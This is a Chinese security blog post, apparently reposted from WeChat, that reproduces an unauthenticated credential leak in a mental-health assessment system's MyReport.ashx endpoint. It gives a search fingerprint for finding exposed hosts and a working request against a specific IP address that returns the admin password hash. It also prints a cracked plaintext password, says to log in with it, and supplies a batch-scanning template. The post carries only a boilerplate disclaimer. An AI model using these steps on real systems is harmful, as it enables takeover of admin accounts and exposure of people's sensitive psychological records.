CAMPING
漏洞简介
京师心智心理健康测评系统由心理学专家指导研发,使用先进的测试方法,通过一系列的数据处理将人的心理特征数量化,以此来衡量个体心理因素水平以及心理差异,帮助开展标准化心理健康工作。京师心智心理健康测评系统 MyReport.ashx接口存在信息泄露漏洞,未经身份验证的攻击者可以利用此漏洞获取系统后台管理员账户密码凭证,并且解密后可登录后台页面,使系统处于极不安全的状态。
CAMPING
漏洞复现
步骤一:使用以下搜索语法获取测试资产并确定测试目标~~~
# 搜索语法body="JS/ligerComboBox/ligerTree.js"
步骤二:使用以下数据包获取目标网站的用户与密码信息.....可获取密码的加密值信息!!!
GET /FunctionModular/PersonalReport/Ajax/MyReport.ashx?type=3&loginName=admin HTTP/1.1Host: 39.96.184.238:8077User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Connection: close
步骤三:在解密网站上进行解密获取明文密码...并在登录界面中进行登陆...
# 解密网站https://cmd5.com/# 明文密码3963ADCBF3248BF75329871CAF462DB8 mentor1
CAMPING
批量脚本
id: XLinfoinfo:name: XLinfoauthor: Administratorseverity: infodescription: descriptionreference:https://tags: tagshttp:raw:|+GET /FunctionModular/PersonalReport/Ajax/MyReport.ashx?type=3&loginName=admin HTTP/1.1Host: {{Hostname}}: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: gzip, deflateConnection: close: Thu, 29 Sep 2022 03:18:46 GMT: "4b76aa2fb2d3d81:0": andmatchers:type: wordpart: bodywords:admintype: statusstatus:200
原文始发于微信公众号(揽月安全团队):京师心智心理健康测评系统 MyReport.ashx 信息泄露漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论